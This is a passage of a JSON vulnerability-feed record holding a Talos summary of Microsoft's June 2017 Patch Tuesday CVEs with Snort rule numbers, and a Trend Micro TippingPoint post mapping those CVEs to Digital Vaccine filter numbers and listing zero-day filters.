The request could be delivered via either an email message or a specially crafted URL on a website.<br /><h4 id=\"h.3mlt339eyw7b\">CVE-2017-8515</h4>This is a denial of service vulnerability in Microsoft Windows that is triggered when an unauthenticated attacker sends a specially crafted kernel mode request. This attack could cause a denial of service on the target system, requiring a reboot to resolve.<br /><h4 id=\"h.z2c1qk9dh3d8\">CVE-2017-8519</h4>This is a remote code execution vulnerability in Internet Explorer related to the improper access of objects in memory. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.<br /><h4 id=\"h.mv8eybhqa5pd\">CVE-2017-8521</h4>This is a remote code execution vulnerability in Microsoft Edge JavaScript scripting engine related to the way the engine handles objects in memory. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.<br /><h4 id=\"h.5ffctj19wxm5\">CVE-2017-8523</h4>This is a security feature bypass vulnerability in Microsoft Edge related to a failure to correctly apply Same Origin Policy for HTML elements present in other browser windows. This vulnerability could be leveraged to trick a user into loading a page with malicious content when a user visits a specially crafted website.<br /><h4 id=\"h.g14jbgu5zebf\">CVE-2017-8529</h4>This is an information disclosure vulnerability that targets both Internet Explorer and Edge. The vulnerability resides specifically in print preview and can be triggered by browsing to a specially crafted URL.<br /><h4 id=\"h.e6il8xov2qu5\">CVE-2017-8530</h4>This is a security feature bypass vulnerability in Microsoft Edge related to a failure to correctly enforce Same Origin Policies potentially allowing an attacker to access information from origins outside of the current one. 
This vulnerability could be leveraged to trick a user into loading a page with malicious content when a user visits a specially crafted website.<br /><h4 id=\"h.yo9w4ohnsd64\">CVE-2017-8531 / CVE-2017-8532 / CVE-2017-8533</h4>These are information disclosure vulnerabilities in the Windows CDI component related to improper disclosure of the contents of its memory. They can be exploited by having a user open a specially crafted document or visit an untrusted webpage.<br /><h4 id=\"h.i2sjbys230jf\">CVE-2017-8534</h4>This is an information disclosure vulnerability in Windows Uniscribe related to the improper disclosure of the contents of its memory. There are multiple ways to exploit this vulnerability including having the user open a specially crafted document or having them visit an untrusted webpage.<br /><h4 id=\"h.1jm00kmnvkvp\">CVE-2017-8544</h4>This is an information disclosure vulnerability in Windows Search related to improper handling of objects in memory. This can be exploited by an attacker sending a specially crafted SMB message to the Windows Search service.<br /><h4 id=\"h.x5xrllpbrgrq\">CVE-2017-8545</h4>This is a spoofing vulnerability in Microsoft Office for Mac related to the failure to properly sanitize HTML or treat it in a safe manner. This can be exploited by sending an email with specific HTML tags that display a malicious authentication prompt and could provide the attacker a user's authentication information or login credentials.<br /><h4 id=\"h.vm3l0n9yt3yj\">CVE-2017-8547</h4>This is a remote code execution vulnerability in Internet Explorer related to improper access of objects in memory. The vulnerability could result in corrupt memory that can be leveraged to execute arbitrary code. 
Exploitation can occur by having a user view a specially crafted website.<br /><h4 id=\"h.ifsntniixnev\">CVE-2017-8550</h4>This is a remote code execution vulnerability in Skype for Business and Microsoft Lync Servers related to a failure to properly sanitize specially crafted content. An authenticated attacker could leverage this vulnerability to execute HTML and JavaScript content in the Skype for Business or Lync context including opening a web page using the default browser or opening another messaging session with another user. Exploitation would require an attacker to invite a user to an instant message session and then send a message that contains specially crafted JavaScript content.<br /><h4 id=\"h.5idaqenq3iuk\">CVE-2017-8551</h4>This is a privilege escalation vulnerability in SharePoint Server related to the improper sanitization of a specially crafted web request. Successful exploitation could result in cross-site scripting attacks on affected systems and the script running in the security context of the current user. Exploitation occurs by an authenticated attacker sending a specially crafted request to an affected SharePoint Server.<br /><h4 id=\"h.dazxtzgr79i4\">CVE-2017-8555</h4>This is a security feature bypass vulnerability in Microsoft Edge related to improper validation of specially crafted documents in the Edge Content Security Policy. This vulnerability could be leveraged to trick a user into loading a web page with malicious content. Exploitation occurs through a user viewing a specially crafted webpage.<br /><h3 id=\"h.x43pguv8bvah\">Coverage</h3>In response to these bulletin disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. 
For the most current rule information, please refer to your Management Center or Snort.org.<br /><br />Snort Rules:<br />17042<br />24500<br />43155-43166<br />43169-43176", "modified": "2017-06-13T20:50:20", "published": "2017-06-13T13:48:00", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/FtF1o6PBkRM/ms-tuesday.html", "id": "TALOSBLOG:212BF0D0902B16A1E3C6ABB19FCEB336", "title": "Microsoft Patch Tuesday - June 2017", "type": "talosblog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "trendmicroblog": [{"lastseen": "2017-06-27T11:16:56", "bulletinFamily": "blog", "cvelist": ["CVE-2017-8488", "CVE-2017-8461", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-0173", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8499", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0286", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8506", "CVE-2017-8464", "CVE-2017-8508", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8469", "CVE-2017-8513", "CVE-2017-8550", "CVE-2017-8492", "CVE-2017-8496", "CVE-2017-8543", "CVE-2017-8545", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8507", "CVE-2017-8474", "CVE-2017-8487", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-8509", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8551", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8512", "CVE-2017-0300", "CVE-2017-8494", 
"CVE-2017-8520", "CVE-2017-8519", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8511", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-0295", "CVE-2017-8555", "CVE-2017-8544", "CVE-2017-8510", "CVE-2017-8514", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8497", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-0215", "CVE-2017-8534", "CVE-2017-8504", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "description": "\n\n\u201cWhat can you sit on, sleep on, and brush your teeth with?\u201d This was the question posed to Steve Martin\u2019s character C.D. Bales in the 1987 movie Roxanne. In a modern take of Edmond Rostand's 1897 verse play Cyrano de Bergerac, the movie centers around C.D.\u2019s attempt to win the love of a woman while navigating life with his unusually large nose. When C.D. wonders what the point of the question is, his god sister responds, \u201cThe point is that sometimes the answer is so obvious, you don't even realize it. It's as plain as the nose on your face.\u201d By the way, the answer to the question is so obvious: a chair, a bed, and a toothbrush.\n\nAt the Gartner Security and Risk Summit in Washington, D.C., held earlier this week, I heard a recurring theme across the various sessions I attended. The theme was around the fact that the discipline of patching isn\u2019t where it needs to be. As we witnessed with the recent WannaCry ransomware attack, which utilized vulnerabilities that were disclosed by The Shadow Brokers and subsequently patched by Microsoft, many organizations were still affected because they hadn\u2019t patched their systems. The general guidance given at various sessions: Patch your systems. 
While the answer is so obvious, it may not be practical for some organizations, especially those with thousands of systems. Our solutions can help through the use of \u201cvirtual patching.\u201d While virtual patching is a term that is now pretty common in the security world, where we stand out is when vulnerabilities haven\u2019t been patched by the vendor. If a vulnerability comes to us via the Zero Day Initiative, we will have protection for our customers ahead of a patch that\u2019s made available by the vendor. This is even more important if a vulnerability is brought to us for a solution that is no longer supported by the vendor. Interestingly enough, with this month\u2019s Microsoft Patch Tuesday, Microsoft has issued SMB patches for Windows XP, which reached its end of support deadline in April 2014. While Microsoft states that doing this is an exception and not the norm, it could create a false \u201csafety net\u201d for those who haven\u2019t upgraded their systems. The precedent that this might set in the future is an answer that isn\u2019t so obvious.\n\n**Microsoft Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Microsoft updates released on or before June 13, 2017. Microsoft released patches for almost 100 new CVEs in Internet Explorer, Edge, Office, Windows, and Skype. A total of 18 of these CVEs are rated Critical. The following table maps Digital Vaccine filters to the Microsoft updates. 
You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [June 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/6/13/the-june-2017-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2017-0173 | | No Vendor Intelligence Provided \nCVE-2017-0193 | | No Vendor Intelligence Provided \nCVE-2017-0215 | 28628 | \nCVE-2017-0216 | | No Vendor Intelligence Provided \nCVE-2017-0218 | | No Vendor Intelligence Provided \nCVE-2017-0219 | | No Vendor Intelligence Provided \nCVE-2017-0260 | | No Vendor Intelligence Provided \nCVE-2017-0282 | | No Vendor Intelligence Provided \nCVE-2017-0283 | | No Vendor Intelligence Provided \nCVE-2017-0284 | | No Vendor Intelligence Provided \nCVE-2017-0285 | | No Vendor Intelligence Provided \nCVE-2017-0286 | | No Vendor Intelligence Provided \nCVE-2017-0287 | | No Vendor Intelligence Provided \nCVE-2017-0288 | | No Vendor Intelligence Provided \nCVE-2017-0289 | | No Vendor Intelligence Provided \nCVE-2017-0291 | | No Vendor Intelligence Provided \nCVE-2017-0292 | | No Vendor Intelligence Provided \nCVE-2017-0294 | | No Vendor Intelligence Provided \nCVE-2017-0295 | | No Vendor Intelligence Provided \nCVE-2017-0296 | | Insufficient Vendor Information \nCVE-2017-0297 | | No Vendor Intelligence Provided \nCVE-2017-0298 | | No Vendor Intelligence Provided \nCVE-2017-0299 | | No Vendor Intelligence Provided \nCVE-2017-0300 | | No Vendor Intelligence Provided \nCVE-2017-8460 | | No Vendor Intelligence Provided \nCVE-2017-8461 | | No Vendor Intelligence Provided \nCVE-2017-8462 | | No Vendor Intelligence Provided \nCVE-2017-8464 | 28614 | \nCVE-2017-8465 | 28616 | \nCVE-2017-8466 | 28618 | \nCVE-2017-8468 | 28620 | \nCVE-2017-8469 | | No Vendor Intelligence Provided \nCVE-2017-8470 | | No Vendor Intelligence Provided \nCVE-2017-8471 | | No Vendor Intelligence Provided \nCVE-2017-8472 | | No Vendor 
Intelligence Provided \nCVE-2017-8473 | | No Vendor Intelligence Provided \nCVE-2017-8474 | | No Vendor Intelligence Provided \nCVE-2017-8475 | | No Vendor Intelligence Provided \nCVE-2017-8476 | | No Vendor Intelligence Provided \nCVE-2017-8477 | | No Vendor Intelligence Provided \nCVE-2017-8478 | | No Vendor Intelligence Provided \nCVE-2017-8479 | | No Vendor Intelligence Provided \nCVE-2017-8480 | | No Vendor Intelligence Provided \nCVE-2017-8481 | | No Vendor Intelligence Provided \nCVE-2017-8482 | | No Vendor Intelligence Provided \nCVE-2017-8483 | | No Vendor Intelligence Provided \nCVE-2017-8484 | | No Vendor Intelligence Provided \nCVE-2017-8485 | | No Vendor Intelligence Provided \nCVE-2017-8487 | | No Vendor Intelligence Provided \nCVE-2017-8488 | | No Vendor Intelligence Provided \nCVE-2017-8489 | | No Vendor Intelligence Provided \nCVE-2017-8490 | | No Vendor Intelligence Provided \nCVE-2017-8491 | | No Vendor Intelligence Provided \nCVE-2017-8492 | | No Vendor Intelligence Provided \nCVE-2017-8493 | | No Vendor Intelligence Provided \nCVE-2017-8494 | | No Vendor Intelligence Provided \nCVE-2017-8496 | 28613 | \nCVE-2017-8497 | 28615 | \nCVE-2017-8498 | | No Vendor Intelligence Provided \nCVE-2017-8499 | | No Vendor Intelligence Provided \nCVE-2017-8504 | | No Vendor Intelligence Provided \nCVE-2017-8506 | | No Vendor Intelligence Provided \nCVE-2017-8507 | | No Vendor Intelligence Provided \nCVE-2017-8508 | | No Vendor Intelligence Provided \nCVE-2017-8509 | 28619 | \nCVE-2017-8510 | 28621 | \nCVE-2017-8511 | | No Vendor Intelligence Provided \nCVE-2017-8512 | | No Vendor Intelligence Provided \nCVE-2017-8513 | | No Vendor Intelligence Provided \nCVE-2017-8514 | | No Vendor Intelligence Provided \nCVE-2017-8515 | | No Vendor Intelligence Provided \nCVE-2017-8517 | | No Vendor Intelligence Provided \nCVE-2017-8519 | | No Vendor Intelligence Provided \nCVE-2017-8520 | | No Vendor Intelligence Provided \nCVE-2017-8521 | | No Vendor Intelligence Provided 
\nCVE-2017-8522 | | No Vendor Intelligence Provided \nCVE-2017-8523 | | No Vendor Intelligence Provided \nCVE-2017-8524 | 28622 | \nCVE-2017-8527 | | No Vendor Intelligence Provided \nCVE-2017-8528 | | No Vendor Intelligence Provided \nCVE-2017-8529 | | Insufficient Vendor Information \nCVE-2017-8530 | | No Vendor Intelligence Provided \nCVE-2017-8531 | | No Vendor Intelligence Provided \nCVE-2017-8532 | | No Vendor Intelligence Provided \nCVE-2017-8533 | | No Vendor Intelligence Provided \nCVE-2017-8534 | | No Vendor Intelligence Provided \nCVE-2017-8543 | 28629 | \nCVE-2017-8544 | | No Vendor Intelligence Provided \nCVE-2017-8545 | | No Vendor Intelligence Provided \nCVE-2017-8547 | 28611 | \nCVE-2017-8548 | | No Vendor Intelligence Provided \nCVE-2017-8549 | | No Vendor Intelligence Provided \nCVE-2017-8550 | | No Vendor Intelligence Provided \nCVE-2017-8551 | | No Vendor Intelligence Provided \nCVE-2017-8553 | | No Vendor Intelligence Provided \nCVE-2017-8554 | | No Vendor Intelligence Provided \nCVE-2017-8555 | | No Vendor Intelligence Provided \n \n \n\n**Zero-Day Filters**\n\nThere are 11 new zero-day filters covering three vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. 
You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (5)_**\n\n * 28543: ZDI-CAN-4719: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28544: ZDI-CAN-4729: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28546: ZDI-CAN-4730: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28547: ZDI-CAN-4731: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28548: ZDI-CAN-4732: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n\n**_Trend Micro (5)_**\n\n * 28536: ZDI-CAN-4652: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28537: ZDI-CAN-4653: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28538: ZDI-CAN-4659: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28541: ZDI-CAN-4664: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28542: ZDI-CAN-4671,4675: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n\n**_Hewlett Packard Enterprise (1)_**\n\n * 28608: HTTPS: HPE Network Automation RedirectServlet SQL Injection Vulnerability (ZDI-17-331)\n\n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-5-2017/>).", "modified": "2017-06-16T12:00:40", "published": "2017-06-16T12:00:40", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-12-2017/", "id": "TRENDMICROBLOG:7C04AD3395CF22028CC84BEFD34A2090", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of June 12, 
2017", "type": "trendmicroblog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}